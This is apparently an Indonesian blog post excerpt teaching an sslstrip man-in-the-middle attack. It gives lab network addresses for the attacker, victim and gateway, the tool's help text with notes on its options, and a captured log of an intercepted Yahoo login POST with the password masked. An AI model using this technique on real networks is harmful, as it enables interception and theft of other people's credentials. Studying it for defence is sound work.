langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan :
- ip attacker : 192.168.1.50
- ip victim : 192.168.1.200
- gateway : 192.168.1.5
sekilas mengenai sslstrip :
Code:
sslstrip 0.1 by Moxie Marlinspike Usage: sslstrip Options: -w , --write= Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l , --listen= Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message
Code:
note : -opsi -a digunakan untuk logging semua trafic ( http,https) -opsi -s digunakan untuk logging traficc ssl saja -opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 ) -opsi : -w : tempat file dump akan disimpan.
Code:
url+="?";if(valid_js()){var passwd=form.passwd.value;var challen function hash2(form){var passwd=form.passwd.value 2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=& amp;.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K. IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=bl4ck.4ngle&passwd=disembunyikan&.save=Sign+In
0 komentar:
Posting Komentar